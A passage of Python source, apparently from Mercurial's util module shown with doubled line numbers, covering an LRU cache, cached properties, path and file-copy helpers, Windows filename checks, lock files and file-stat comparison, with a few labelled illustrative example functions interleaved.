1283 1283 self._movetohead(node)
1284 1284 return node.value
1285 1285
1286 1286 def insert(self, k, v, cost=0):
1287 1287 """Insert a new item in the cache with optional cost value."""
1288 1288 node = self._cache.get(k)
1289 1289 # Replace existing value and mark as newest.
1290 1290 if node is not None:
1291 1291 self.totalcost -= node.cost
1292 1292 node.value = v
1293 1293 node.cost = cost
1294 1294 self.totalcost += cost
1295 1295 self._movetohead(node)
1296 1296
1297 1297 if self.maxcost:
1298 1298 self._enforcecostlimit()
1299 1299
1300 1300 return
1301 1301
1302 1302 if self._size < self.capacity:
1303 1303 node = self._addcapacity()
1304 1304 else:
1305 1305 # Grab the last/oldest item.
1306 1306 node = self._head.prev
1307 1307
1308 1308 # At capacity. Kill the old entry.
1309 1309 if node.key is not _notset:
1310 1310 self.totalcost -= node.cost
1311 1311 del self._cache[node.key]
1312 1312
1313 1313 node.key = k
1314 1314 node.value = v
1315 1315 node.cost = cost
1316 1316 self.totalcost += cost
1317 1317 self._cache[k] = node
1318 1318 # And mark it as newest entry. No need to adjust order since it
1319 1319 # is already self._head.prev.
1320 1320 self._head = node
1321 1321
1322 1322 if self.maxcost:
1323 1323 self._enforcecostlimit()
1324 1324
1325 1325 def __setitem__(self, k, v):
1326 1326 self.insert(k, v)
1327 1327
1328 1328 def __delitem__(self, k):
1329 1329 self.pop(k)
1330 1330
1331 1331 def pop(self, k, default=_notset):
1332 1332 try:
1333 1333 node = self._cache.pop(k)
1334 1334 except KeyError:
1335 1335 if default is _notset:
1336 1336 raise
1337 1337 return default
1338 1338 value = node.value
1339 1339 self.totalcost -= node.cost
1340 1340 node.markempty()
1341 1341
1342 1342 # Temporarily mark as newest item before re-adjusting head to make
1343 1343 # this node the oldest item.
1344 1344 self._movetohead(node)
1345 1345 self._head = node.next
1346 1346
1347 1347 return value
1348 1348
1349 1349 # Additional dict methods.
1350 1350
1351 1351 def get(self, k, default=None):
1352 1352 try:
1353 1353 return self.__getitem__(k)
1354 1354 except KeyError:
1355 1355 return default
1356 1356
1357 1357 def peek(self, k, default=_notset):
1358 1358 """Get the specified item without moving it to the head
1359 1359
1360 1360 Unlike get(), this doesn't mutate the internal state. But be aware
1361 1361 that this does not make peek() thread safe.
1362 1362 """
1363 1363 try:
1364 1364 node = self._cache[k]
1365 1365 return node.value
1366 1366 except KeyError:
1367 1367 if default is _notset:
1368 1368 raise
1369 1369 return default
1370 1370
1371 1371 def clear(self):
1372 1372 n = self._head
1373 1373 while n.key is not _notset:
1374 1374 self.totalcost -= n.cost
1375 1375 n.markempty()
1376 1376 n = n.next
1377 1377
1378 1378 self._cache.clear()
1379 1379
1380 1380 def copy(self, capacity=None, maxcost=0):
1381 1381 """Create a new cache as a copy of the current one.
1382 1382
1383 1383 By default, the new cache has the same capacity as the existing one.
1384 1384 But, the cache capacity can be changed as part of performing the
1385 1385 copy.
1386 1386
1387 1387 Items in the copy have an insertion/access order matching this
1388 1388 instance.
1389 1389 """
1390 1390
1391 1391 capacity = capacity or self.capacity
1392 1392 maxcost = maxcost or self.maxcost
1393 1393 result = lrucachedict(capacity, maxcost=maxcost)
1394 1394
1395 1395 # We copy entries by iterating in oldest-to-newest order so the copy
1396 1396 # has the correct ordering.
1397 1397
1398 1398 # Find the first non-empty entry.
1399 1399 n = self._head.prev
1400 1400 while n.key is _notset and n is not self._head:
1401 1401 n = n.prev
1402 1402
1403 1403 # We could potentially skip the first N items when decreasing capacity.
1404 1404 # But let's keep it simple unless it is a performance problem.
1405 1405 for i in range(len(self._cache)):
1406 1406 result.insert(n.key, n.value, cost=n.cost)
1407 1407 n = n.prev
1408 1408
1409 1409 return result
1410 1410
1411 1411 def popoldest(self):
1412 1412 """Remove the oldest item from the cache.
1413 1413
1414 1414 Returns the (key, value) describing the removed cache entry.
1415 1415 """
1416 1416 if not self._cache:
1417 1417 return
1418 1418
1419 1419 # Walk the linked list backwards starting at tail node until we hit
1420 1420 # a non-empty node.
1421 1421 n = self._head.prev
1422 1422 while n.key is _notset:
1423 1423 n = n.prev
1424 1424
1425 1425 key, value = n.key, n.value
1426 1426
1427 1427 # And remove it from the cache and mark it as empty.
1428 1428 del self._cache[n.key]
1429 1429 self.totalcost -= n.cost
1430 1430 n.markempty()
1431 1431
1432 1432 return key, value
1433 1433
1434 1434 def _movetohead(self, node):
1435 1435 """Mark a node as the newest, making it the new head.
1436 1436
1437 1437 When a node is accessed, it becomes the freshest entry in the LRU
1438 1438 list, which is denoted by self._head.
1439 1439
1440 1440 Visually, let's make ``N`` the new head node (* denotes head):
1441 1441
1442 1442 previous/oldest <-> head <-> next/next newest
1443 1443
1444 1444 ----<->--- A* ---<->-----
1445 1445 | |
1446 1446 E <-> D <-> N <-> C <-> B
1447 1447
1448 1448 To:
1449 1449
1450 1450 ----<->--- N* ---<->-----
1451 1451 | |
1452 1452 E <-> D <-> C <-> B <-> A
1453 1453
1454 1454 This requires the following moves:
1455 1455
1456 1456 C.next = D (node.prev.next = node.next)
1457 1457 D.prev = C (node.next.prev = node.prev)
1458 1458 E.next = N (head.prev.next = node)
1459 1459 N.prev = E (node.prev = head.prev)
1460 1460 N.next = A (node.next = head)
1461 1461 A.prev = N (head.prev = node)
1462 1462 """
1463 1463 head = self._head
1464 1464 # C.next = D
1465 1465 node.prev.next = node.next
1466 1466 # D.prev = C
1467 1467 node.next.prev = node.prev
1468 1468 # N.prev = E
1469 1469 node.prev = head.prev
1470 1470 # N.next = A
1471 1471 # It is tempting to use just "head" here; however, if node is
1472 1472 # adjacent to head, this will do bad things.
1473 1473 node.next = head.prev.next
1474 1474 # E.next = N
1475 1475 node.next.prev = node
1476 1476 # A.prev = N
1477 1477 node.prev.next = node
1478 1478
1479 1479 self._head = node
1480 1480
1481 1481 def _addcapacity(self):
1482 1482 """Add a node to the circular linked list.
1483 1483
1484 1484 The new node is inserted before the head node.
1485 1485 """
1486 1486 head = self._head
1487 1487 node = _lrucachenode()
1488 1488 head.prev.next = node
1489 1489 node.prev = head.prev
1490 1490 node.next = head
1491 1491 head.prev = node
1492 1492 self._size += 1
1493 1493 return node
1494 1494
1495 1495 def _enforcecostlimit(self):
1496 1496 # This should run after an insertion. It should only be called if total
1497 1497 # cost limits are being enforced.
1498 1498 # The most recently inserted node is never evicted.
1499 1499 if len(self) <= 1 or self.totalcost <= self.maxcost:
1500 1500 return
1501 1501
1502 1502 # This is logically equivalent to calling popoldest() until we
1503 1503 # free up enough cost. We don't do that since popoldest() needs
1504 1504 # to walk the linked list and doing this in a loop would be
1505 1505 # quadratic. So we find the first non-empty node and then
1506 1506 # walk nodes until we free up enough capacity.
1507 1507 #
1508 1508 # If we only removed the minimum number of nodes to free enough
1509 1509 # cost at insert time, chances are high that the next insert would
1510 1510 # also require pruning. This would effectively constitute quadratic
1511 1511 # behavior for insert-heavy workloads. To mitigate this, we set a
1512 1512 # target cost that is a percentage of the max cost. This will tend
1513 1513 # to free more nodes when the high water mark is reached, which
1514 1514 # lowers the chances of needing to prune on the subsequent insert.
1515 1515 targetcost = int(self.maxcost * 0.75)
1516 1516
1517 1517 n = self._head.prev
1518 1518 while n.key is _notset:
1519 1519 n = n.prev
1520 1520
1521 1521 while len(self) > 1 and self.totalcost > targetcost:
1522 1522 del self._cache[n.key]
1523 1523 self.totalcost -= n.cost
1524 1524 n.markempty()
1525 1525 n = n.prev
1526 1526
1527 1527 def lrucachefunc(func):
1528 1528 '''cache most recent results of function calls'''
1529 1529 cache = {}
1530 1530 order = collections.deque()
1531 1531 if func.__code__.co_argcount == 1:
1532 1532 def f(arg):
1533 1533 if arg not in cache:
1534 1534 if len(cache) > 20:
1535 1535 del cache[order.popleft()]
1536 1536 cache[arg] = func(arg)
1537 1537 else:
1538 1538 order.remove(arg)
1539 1539 order.append(arg)
1540 1540 return cache[arg]
1541 1541 else:
1542 1542 def f(*args):
1543 1543 if args not in cache:
1544 1544 if len(cache) > 20:
1545 1545 del cache[order.popleft()]
1546 1546 cache[args] = func(*args)
1547 1547 else:
1548 1548 order.remove(args)
1549 1549 order.append(args)
1550 1550 return cache[args]
1551 1551
1552 1552 return f
1553 1553
1554 1554 class propertycache(object):
1555 1555 def __init__(self, func):
1556 1556 self.func = func
1557 1557 self.name = func.__name__
1558 1558 def __get__(self, obj, type=None):
1559 1559 result = self.func(obj)
1560 1560 self.cachevalue(obj, result)
1561 1561 return result
1562 1562
1563 1563 def cachevalue(self, obj, value):
1564 1564 # __dict__ assignment required to bypass __setattr__ (eg: repoview)
1565 1565 obj.__dict__[self.name] = value
1566 1566
1567 1567 def clearcachedproperty(obj, prop):
1568 1568 '''clear a cached property value, if one has been set'''
1569 1569 prop = pycompat.sysstr(prop)
1570 1570 if prop in obj.__dict__:
1571 1571 del obj.__dict__[prop]
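
# Illustrative sketch (hypothetical class, not part of the original module):
# propertycache computes the value on first access and stores it in the
# instance __dict__, so later accesses bypass the function;
# clearcachedproperty() forces recomputation.
def _propertycacheexample():
    class counter(object):
        computed = 0
        @propertycache
        def value(self):
            counter.computed += 1
            return 42
    c = counter()
    assert (c.value, c.value) == (42, 42)
    assert counter.computed == 1   # computed only once
    clearcachedproperty(c, 'value')
    assert c.value == 42 and counter.computed == 2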
1572 1572
1573 1573 def increasingchunks(source, min=1024, max=65536):
1574 1574 '''return no less than min bytes per chunk while data remains,
1575 1575 doubling min after each chunk until it reaches max'''
1576 1576 def log2(x):
1577 1577 if not x:
1578 1578 return 0
1579 1579 i = 0
1580 1580 while x:
1581 1581 x >>= 1
1582 1582 i += 1
1583 1583 return i - 1
1584 1584
1585 1585 buf = []
1586 1586 blen = 0
1587 1587 for chunk in source:
1588 1588 buf.append(chunk)
1589 1589 blen += len(chunk)
1590 1590 if blen >= min:
1591 1591 if min < max:
1592 1592 min = min << 1
1593 1593 nmin = 1 << log2(blen)
1594 1594 if nmin > min:
1595 1595 min = nmin
1596 1596 if min > max:
1597 1597 min = max
1598 1598 yield ''.join(buf)
1599 1599 blen = 0
1600 1600 buf = []
1601 1601 if buf:
1602 1602 yield ''.join(buf)
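
# Illustrative sketch (hypothetical helper): increasingchunks() regroups
# small chunks into progressively larger ones; min doubles after each
# emitted chunk (or jumps to the largest power of two not exceeding the
# bytes already buffered), capped at max.
def _increasingchunksexample():
    source = [b'x' * 500] * 10
    sizes = [len(c) for c in increasingchunks(source, min=1024, max=4096)]
    assert sizes == [1500, 2500, 1000]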
1603 1603
1604 1604 def always(fn):
1605 1605 return True
1606 1606
1607 1607 def never(fn):
1608 1608 return False
1609 1609
1610 1610 def nogc(func):
1611 1611 """disable garbage collector
1612 1612
1613 1613 Python's garbage collector triggers a GC each time a certain number of
1614 1614 container objects (the number being defined by gc.get_threshold()) are
1615 1615 allocated even when marked not to be tracked by the collector. Tracking has
1616 1616 no effect on when GCs are triggered, only on what objects the GC looks
1617 1617 into. As a workaround, disable GC while building complex (huge)
1618 1618 containers.
1619 1619
1620 1620 This garbage collector issue has been fixed in 2.7, but it still affects
1621 1621 CPython's performance.
1622 1622 """
1623 1623 def wrapper(*args, **kwargs):
1624 1624 gcenabled = gc.isenabled()
1625 1625 gc.disable()
1626 1626 try:
1627 1627 return func(*args, **kwargs)
1628 1628 finally:
1629 1629 if gcenabled:
1630 1630 gc.enable()
1631 1631 return wrapper
1632 1632
1633 1633 if pycompat.ispypy:
1634 1634 # PyPy runs slower with gc disabled
1635 1635 nogc = lambda x: x
1636 1636
1637 1637 def pathto(root, n1, n2):
1638 1638 '''return the relative path from one place to another.
1639 1639 root should use os.sep to separate directories
1640 1640 n1 should use os.sep to separate directories
1641 1641 n2 should use "/" to separate directories
1642 1642 returns an os.sep-separated path.
1643 1643
1644 1644 If n1 is a relative path, it's assumed it's
1645 1645 relative to root.
1646 1646 n2 should always be relative to root.
1647 1647 '''
1648 1648 if not n1:
1649 1649 return localpath(n2)
1650 1650 if os.path.isabs(n1):
1651 1651 if os.path.splitdrive(root)[0] != os.path.splitdrive(n1)[0]:
1652 1652 return os.path.join(root, localpath(n2))
1653 1653 n2 = '/'.join((pconvert(root), n2))
1654 1654 a, b = splitpath(n1), n2.split('/')
1655 1655 a.reverse()
1656 1656 b.reverse()
1657 1657 while a and b and a[-1] == b[-1]:
1658 1658 a.pop()
1659 1659 b.pop()
1660 1660 b.reverse()
1661 1661 return pycompat.ossep.join((['..'] * len(a)) + b) or '.'
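
# Illustrative sketch (hypothetical paths, POSIX separators assumed):
# pathto() climbs out of n1's directory far enough to reach n2.
def _pathtoexample():
    if pycompat.ossep == b'/':
        assert (pathto(b'/repo', b'a/b/file.txt', b'a/c/other.txt')
                == b'../../c/other.txt')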
1662 1662
1663 1663 # the location of data files matching the source code
1664 1664 if procutil.mainfrozen() and getattr(sys, 'frozen', None) != 'macosx_app':
1665 1665 # executable version (py2exe) doesn't support __file__
1666 1666 datapath = os.path.dirname(pycompat.sysexecutable)
1667 1667 else:
1668 1668 datapath = os.path.dirname(pycompat.fsencode(__file__))
1669 1669
1670 1670 i18n.setdatapath(datapath)
1671 1671
1672 1672 def checksignature(func):
1673 1673 '''wrap a function with code to check for calling errors'''
1674 1674 def check(*args, **kwargs):
1675 1675 try:
1676 1676 return func(*args, **kwargs)
1677 1677 except TypeError:
1678 1678 if len(traceback.extract_tb(sys.exc_info()[2])) == 1:
1679 1679 raise error.SignatureError
1680 1680 raise
1681 1681
1682 1682 return check
1683 1683
1684 1684 # a whitelist of known filesystems where hardlinks work reliably
1685 1685 _hardlinkfswhitelist = {
1686 1686 'apfs',
1687 1687 'btrfs',
1688 1688 'ext2',
1689 1689 'ext3',
1690 1690 'ext4',
1691 1691 'hfs',
1692 1692 'jfs',
1693 1693 'NTFS',
1694 1694 'reiserfs',
1695 1695 'tmpfs',
1696 1696 'ufs',
1697 1697 'xfs',
1698 1698 'zfs',
1699 1699 }
1700 1700
1701 1701 def copyfile(src, dest, hardlink=False, copystat=False, checkambig=False):
1702 1702 '''copy a file, preserving mode and optionally other stat info like
1703 1703 atime/mtime
1704 1704
1705 1705 checkambig argument is used with filestat, and is useful only if
1706 1706 destination file is guarded by any lock (e.g. repo.lock or
1707 1707 repo.wlock).
1708 1708
1709 1709 copystat and checkambig should be exclusive.
1710 1710 '''
1711 1711 assert not (copystat and checkambig)
1712 1712 oldstat = None
1713 1713 if os.path.lexists(dest):
1714 1714 if checkambig:
1715 1715 oldstat = checkambig and filestat.frompath(dest)
1716 1716 unlink(dest)
1717 1717 if hardlink:
1718 1718 # Hardlinks are problematic on CIFS (issue4546), do not allow hardlinks
1719 1719 # unless we are confident that dest is on a whitelisted filesystem.
1720 1720 try:
1721 1721 fstype = getfstype(os.path.dirname(dest))
1722 1722 except OSError:
1723 1723 fstype = None
1724 1724 if fstype not in _hardlinkfswhitelist:
1725 1725 hardlink = False
1726 1726 if hardlink:
1727 1727 try:
1728 1728 oslink(src, dest)
1729 1729 return
1730 1730 except (IOError, OSError):
1731 1731 pass # fall back to normal copy
1732 1732 if os.path.islink(src):
1733 1733 os.symlink(os.readlink(src), dest)
1734 1734 # copytime is ignored for symlinks, but in general copytime isn't needed
1735 1735 # for them anyway
1736 1736 else:
1737 1737 try:
1738 1738 shutil.copyfile(src, dest)
1739 1739 if copystat:
1740 1740 # copystat also copies mode
1741 1741 shutil.copystat(src, dest)
1742 1742 else:
1743 1743 shutil.copymode(src, dest)
1744 1744 if oldstat and oldstat.stat:
1745 1745 newstat = filestat.frompath(dest)
1746 1746 if newstat.isambig(oldstat):
1747 1747 # stat of copied file is ambiguous to original one
1748 1748 advanced = (
1749 1749 oldstat.stat[stat.ST_MTIME] + 1) & 0x7fffffff
1750 1750 os.utime(dest, (advanced, advanced))
1751 1751 except shutil.Error as inst:
1752 1752 raise error.Abort(str(inst))
1753 1753
1754 1754 def copyfiles(src, dst, hardlink=None, progress=None):
1755 1755 """Copy a directory tree using hardlinks if possible."""
1756 1756 num = 0
1757 1757
1758 1758 def settopic():
1759 1759 if progress:
1760 1760 progress.topic = _('linking') if hardlink else _('copying')
1761 1761
1762 1762 if os.path.isdir(src):
1763 1763 if hardlink is None:
1764 1764 hardlink = (os.stat(src).st_dev ==
1765 1765 os.stat(os.path.dirname(dst)).st_dev)
1766 1766 settopic()
1767 1767 os.mkdir(dst)
1768 1768 for name, kind in listdir(src):
1769 1769 srcname = os.path.join(src, name)
1770 1770 dstname = os.path.join(dst, name)
1771 1771 hardlink, n = copyfiles(srcname, dstname, hardlink, progress)
1772 1772 num += n
1773 1773 else:
1774 1774 if hardlink is None:
1775 1775 hardlink = (os.stat(os.path.dirname(src)).st_dev ==
1776 1776 os.stat(os.path.dirname(dst)).st_dev)
1777 1777 settopic()
1778 1778
1779 1779 if hardlink:
1780 1780 try:
1781 1781 oslink(src, dst)
1782 1782 except (IOError, OSError):
1783 1783 hardlink = False
1784 1784 shutil.copy(src, dst)
1785 1785 else:
1786 1786 shutil.copy(src, dst)
1787 1787 num += 1
1788 1788 if progress:
1789 1789 progress.increment()
1790 1790
1791 1791 return hardlink, num
1792 1792
1793 1793 _winreservednames = {
1794 1794 'con', 'prn', 'aux', 'nul',
1795 1795 'com1', 'com2', 'com3', 'com4', 'com5', 'com6', 'com7', 'com8', 'com9',
1796 1796 'lpt1', 'lpt2', 'lpt3', 'lpt4', 'lpt5', 'lpt6', 'lpt7', 'lpt8', 'lpt9',
1797 1797 }
1798 1798 _winreservedchars = ':*?"<>|'
1799 1799 def checkwinfilename(path):
1800 1800 r'''Check that the base-relative path is a valid filename on Windows.
1801 1801 Returns None if the path is ok, or a UI string describing the problem.
1802 1802
1803 1803 >>> checkwinfilename(b"just/a/normal/path")
1804 1804 >>> checkwinfilename(b"foo/bar/con.xml")
1805 1805 "filename contains 'con', which is reserved on Windows"
1806 1806 >>> checkwinfilename(b"foo/con.xml/bar")
1807 1807 "filename contains 'con', which is reserved on Windows"
1808 1808 >>> checkwinfilename(b"foo/bar/xml.con")
1809 1809 >>> checkwinfilename(b"foo/bar/AUX/bla.txt")
1810 1810 "filename contains 'AUX', which is reserved on Windows"
1811 1811 >>> checkwinfilename(b"foo/bar/bla:.txt")
1812 1812 "filename contains ':', which is reserved on Windows"
1813 1813 >>> checkwinfilename(b"foo/bar/b\07la.txt")
1814 1814 "filename contains '\\x07', which is invalid on Windows"
1815 1815 >>> checkwinfilename(b"foo/bar/bla ")
1816 1816 "filename ends with ' ', which is not allowed on Windows"
1817 1817 >>> checkwinfilename(b"../bar")
1818 1818 >>> checkwinfilename(b"foo\\")
1819 1819 "filename ends with '\\', which is invalid on Windows"
1820 1820 >>> checkwinfilename(b"foo\\/bar")
1821 1821 "directory name ends with '\\', which is invalid on Windows"
1822 1822 '''
1823 1823 if path.endswith('\\'):
1824 1824 return _("filename ends with '\\', which is invalid on Windows")
1825 1825 if '\\/' in path:
1826 1826 return _("directory name ends with '\\', which is invalid on Windows")
1827 1827 for n in path.replace('\\', '/').split('/'):
1828 1828 if not n:
1829 1829 continue
1830 1830 for c in _filenamebytestr(n):
1831 1831 if c in _winreservedchars:
1832 1832 return _("filename contains '%s', which is reserved "
1833 1833 "on Windows") % c
1834 1834 if ord(c) <= 31:
1835 1835 return _("filename contains '%s', which is invalid "
1836 1836 "on Windows") % stringutil.escapestr(c)
1837 1837 base = n.split('.')[0]
1838 1838 if base and base.lower() in _winreservednames:
1839 1839 return _("filename contains '%s', which is reserved "
1840 1840 "on Windows") % base
1841 1841 t = n[-1:]
1842 1842 if t in '. ' and n not in '..':
1843 1843 return _("filename ends with '%s', which is not allowed "
1844 1844 "on Windows") % t
1845 1845
1846 1846 if pycompat.iswindows:
1847 1847 checkosfilename = checkwinfilename
1848 1848 timer = time.clock
1849 1849 else:
1850 1850 checkosfilename = platform.checkosfilename
1851 1851 timer = time.time
1852 1852
1853 1853 if safehasattr(time, "perf_counter"):
1854 1854 timer = time.perf_counter
1855 1855
1856 1856 def makelock(info, pathname):
1857 1857 """Create a lock file atomically if possible
1858 1858
1859 1859 This may leave a stale lock file if symlink isn't supported and signal
1860 1860 interrupt is enabled.
1861 1861 """
1862 1862 try:
1863 1863 return os.symlink(info, pathname)
1864 1864 except OSError as why:
1865 1865 if why.errno == errno.EEXIST:
1866 1866 raise
1867 1867 except AttributeError: # no symlink in os
1868 1868 pass
1869 1869
1870 1870 flags = os.O_CREAT | os.O_WRONLY | os.O_EXCL | getattr(os, 'O_BINARY', 0)
1871 1871 ld = os.open(pathname, flags)
1872 1872 os.write(ld, info)
1873 1873 os.close(ld)
1874 1874
1875 1875 def readlock(pathname):
1876 1876 try:
1877 1877 return readlink(pathname)
1878 1878 except OSError as why:
1879 1879 if why.errno not in (errno.EINVAL, errno.ENOSYS):
1880 1880 raise
1881 1881 except AttributeError: # no symlink in os
1882 1882 pass
1883 1883 with posixfile(pathname, 'rb') as fp:
1884 1884 return fp.read()
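
# Illustrative sketch (hypothetical lock path): the lock "file" is preferably
# a symlink whose target encodes the holder; readlock() recovers that string
# whether a symlink or a regular file was used.
def _makelockexample(lockpath):
    makelock(b'example.host:12345', lockpath)
    assert readlock(lockpath) == b'example.host:12345'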
1885 1885
1886 1886 def fstat(fp):
1887 1887 '''stat file object that may not have fileno method.'''
1888 1888 try:
1889 1889 return os.fstat(fp.fileno())
1890 1890 except AttributeError:
1891 1891 return os.stat(fp.name)
1892 1892
1893 1893 # File system features
1894 1894
1895 1895 def fscasesensitive(path):
1896 1896 """
1897 1897 Return true if the given path is on a case-sensitive filesystem
1898 1898
1899 1899 Requires a path (like /foo/.hg) ending with a foldable final
1900 1900 directory component.
1901 1901 """
1902 1902 s1 = os.lstat(path)
1903 1903 d, b = os.path.split(path)
1904 1904 b2 = b.upper()
1905 1905 if b == b2:
1906 1906 b2 = b.lower()
1907 1907 if b == b2:
1908 1908 return True # no evidence against case sensitivity
1909 1909 p2 = os.path.join(d, b2)
1910 1910 try:
1911 1911 s2 = os.lstat(p2)
1912 1912 if s2 == s1:
1913 1913 return False
1914 1914 return True
1915 1915 except OSError:
1916 1916 return True
1917 1917
1918 1918 try:
1919 1919 import re2
1920 1920 _re2 = None
1921 1921 except ImportError:
1922 1922 _re2 = False
1923 1923
1924 1924 class _re(object):
1925 1925 def _checkre2(self):
1926 1926 global _re2
1927 1927 try:
1928 1928 # check if match works, see issue3964
1929 1929 _re2 = bool(re2.match(r'\[([^\[]+)\]', '[ui]'))
1930 1930 except ImportError:
1931 1931 _re2 = False
1932 1932
1933 1933 def compile(self, pat, flags=0):
1934 1934 '''Compile a regular expression, using re2 if possible
1935 1935
1936 1936 For best performance, use only re2-compatible regexp features. The
1937 1937 only flags from the re module that are re2-compatible are
1938 1938 IGNORECASE and MULTILINE.'''
1939 1939 if _re2 is None:
1940 1940 self._checkre2()
1941 1941 if _re2 and (flags & ~(remod.IGNORECASE | remod.MULTILINE)) == 0:
1942 1942 if flags & remod.IGNORECASE:
1943 1943 pat = '(?i)' + pat
1944 1944 if flags & remod.MULTILINE:
1945 1945 pat = '(?m)' + pat
1946 1946 try:
1947 1947 return re2.compile(pat)
1948 1948 except re2.error:
1949 1949 pass
1950 1950 return remod.compile(pat, flags)
1951 1951
1952 1952 @propertycache
1953 1953 def escape(self):
1954 1954 '''Return the version of escape corresponding to self.compile.
1955 1955
1956 1956 This is imperfect because whether re2 or re is used for a particular
1957 1957 function depends on the flags, etc, but it's the best we can do.
1958 1958 '''
1959 1959 global _re2
1960 1960 if _re2 is None:
1961 1961 self._checkre2()
1962 1962 if _re2:
1963 1963 return re2.escape
1964 1964 else:
1965 1965 return remod.escape
1966 1966
1967 1967 re = _re()
1968 1968
1969 1969 _fspathcache = {}
1970 1970 def fspath(name, root):
1971 1971 '''Get name in the case stored in the filesystem
1972 1972
1973 1973 The name should be relative to root, and be normcase-ed for efficiency.
1974 1974
1975 1975 Note that this function is unnecessary, and should not be
1976 1976 called, for case-sensitive filesystems (simply because it's expensive).
1977 1977
1978 1978 The root should be normcase-ed, too.
1979 1979 '''
1980 1980 def _makefspathcacheentry(dir):
1981 1981 return dict((normcase(n), n) for n in os.listdir(dir))
1982 1982
1983 1983 seps = pycompat.ossep
1984 1984 if pycompat.osaltsep:
1985 1985 seps = seps + pycompat.osaltsep
1986 1986 # Protect backslashes. This gets silly very quickly.
1987 1987 seps = seps.replace('\\', '\\\\')
1988 1988 pattern = remod.compile(br'([^%s]+)|([%s]+)' % (seps, seps))
1989 1989 dir = os.path.normpath(root)
1990 1990 result = []
1991 1991 for part, sep in pattern.findall(name):
1992 1992 if sep:
1993 1993 result.append(sep)
1994 1994 continue
1995 1995
1996 1996 if dir not in _fspathcache:
1997 1997 _fspathcache[dir] = _makefspathcacheentry(dir)
1998 1998 contents = _fspathcache[dir]
1999 1999
2000 2000 found = contents.get(part)
2001 2001 if not found:
2002 2002 # retry "once per directory" per "dirstate.walk" which
2003 2003 # may take place for each patch of "hg qpush", for example
2004 2004 _fspathcache[dir] = contents = _makefspathcacheentry(dir)
2005 2005 found = contents.get(part)
2006 2006
2007 2007 result.append(found or part)
2008 2008 dir = os.path.join(dir, part)
2009 2009
2010 2010 return ''.join(result)
2011 2011
2012 2012 def checknlink(testfile):
2013 2013 '''check whether hardlink count reporting works properly'''
2014 2014
2015 2015 # testfile may be open, so we need a separate file for checking to
2016 2016 # work around issue2543 (or testfile may get lost on Samba shares)
2017 2017 f1, f2, fp = None, None, None
2018 2018 try:
2019 2019 fd, f1 = pycompat.mkstemp(prefix='.%s-' % os.path.basename(testfile),
2020 2020 suffix='1~', dir=os.path.dirname(testfile))
2021 2021 os.close(fd)
2022 2022 f2 = '%s2~' % f1[:-2]
2023 2023
2024 2024 oslink(f1, f2)
2025 2025 # nlinks() may behave differently for files on Windows shares if
2026 2026 # the file is open.
2027 2027 fp = posixfile(f2)
2028 2028 return nlinks(f2) > 1
2029 2029 except OSError:
2030 2030 return False
2031 2031 finally:
2032 2032 if fp is not None:
2033 2033 fp.close()
2034 2034 for f in (f1, f2):
2035 2035 try:
2036 2036 if f is not None:
2037 2037 os.unlink(f)
2038 2038 except OSError:
2039 2039 pass
2040 2040
2041 2041 def endswithsep(path):
2042 2042 '''Check path ends with os.sep or os.altsep.'''
2043 2043 return (path.endswith(pycompat.ossep)
2044 2044 or pycompat.osaltsep and path.endswith(pycompat.osaltsep))
2045 2045
2046 2046 def splitpath(path):
2047 2047 '''Split path by os.sep.
2048 2048 Note that this function does not use os.altsep because this is
2049 2049 an alternative of simple "xxx.split(os.sep)".
2050 2050 It is recommended to use os.path.normpath() before using this
2051 2051 function if needed.'''
2052 2052 return path.split(pycompat.ossep)
2053 2053
2054 2054 def mktempcopy(name, emptyok=False, createmode=None, enforcewritable=False):
2055 2055 """Create a temporary file with the same contents from name
2056 2056
2057 2057 The permission bits are copied from the original file.
2058 2058
2059 2059 If the temporary file is going to be truncated immediately, you
2060 2060 can use emptyok=True as an optimization.
2061 2061
2062 2062 Returns the name of the temporary file.
2063 2063 """
2064 2064 d, fn = os.path.split(name)
2065 2065 fd, temp = pycompat.mkstemp(prefix='.%s-' % fn, suffix='~', dir=d)
2066 2066 os.close(fd)
2067 2067 # Temporary files are created with mode 0600, which is usually not
2068 2068 # what we want. If the original file already exists, just copy
2069 2069 # its mode. Otherwise, manually obey umask.
2070 2070 copymode(name, temp, createmode, enforcewritable)
2071 2071
2072 2072 if emptyok:
2073 2073 return temp
2074 2074 try:
2075 2075 try:
2076 2076 ifp = posixfile(name, "rb")
2077 2077 except IOError as inst:
2078 2078 if inst.errno == errno.ENOENT:
2079 2079 return temp
2080 2080 if not getattr(inst, 'filename', None):
2081 2081 inst.filename = name
2082 2082 raise
2083 2083 ofp = posixfile(temp, "wb")
2084 2084 for chunk in filechunkiter(ifp):
2085 2085 ofp.write(chunk)
2086 2086 ifp.close()
2087 2087 ofp.close()
2088 2088 except: # re-raises
2089 2089 try:
2090 2090 os.unlink(temp)
2091 2091 except OSError:
2092 2092 pass
2093 2093 raise
2094 2094 return temp
2095 2095
2096 2096 class filestat(object):
2097 2097 """help to exactly detect change of a file
2098 2098
2099 2099 'stat' attribute is result of 'os.stat()' if specified 'path'
2100 2100 exists. Otherwise, it is None. This avoids a preparatory
2101 2101 'exists()' check on the caller's side.
2102 2102 """
2103 2103 def __init__(self, stat):
2104 2104 self.stat = stat
2105 2105
2106 2106 @classmethod
2107 2107 def frompath(cls, path):
2108 2108 try:
2109 2109 stat = os.stat(path)
2110 2110 except OSError as err:
2111 2111 if err.errno != errno.ENOENT:
2112 2112 raise
2113 2113 stat = None
2114 2114 return cls(stat)
2115 2115
2116 2116 @classmethod
2117 2117 def fromfp(cls, fp):
2118 2118 stat = os.fstat(fp.fileno())
2119 2119 return cls(stat)
2120 2120
2121 2121 __hash__ = object.__hash__
2122 2122
2123 2123 def __eq__(self, old):
2124 2124 try:
2125 2125 # if ambiguity between stat of new and old file is
2126 2126 # avoided, comparison of size, ctime and mtime is enough
2127 2127 # to exactly detect change of a file regardless of platform
2128 2128 return (self.stat.st_size == old.stat.st_size and
2129 2129 self.stat[stat.ST_CTIME] == old.stat[stat.ST_CTIME] and
2130 2130 self.stat[stat.ST_MTIME] == old.stat[stat.ST_MTIME])
2131 2131 except AttributeError:
2132 2132 pass
2133 2133 try:
2134 2134 return self.stat is None and old.stat is None
2135 2135 except AttributeError:
2136 2136 return False
2137 2137
2138 2138 def isambig(self, old):
2139 2139 """Examine whether new (= self) stat is ambiguous against old one
2140 2140
2141 2141 "S[N]" below means stat of a file at N-th change:
2142 2142
2143 2143 - S[n-1].ctime < S[n].ctime: can detect change of a file
2144 2144 - S[n-1].ctime == S[n].ctime
2145 2145 - S[n-1].ctime < S[n].mtime: means natural advancing (*1)
2146 2146 - S[n-1].ctime == S[n].mtime: is ambiguous (*2)
2147 2147 - S[n-1].ctime > S[n].mtime: never occurs naturally (don't care)
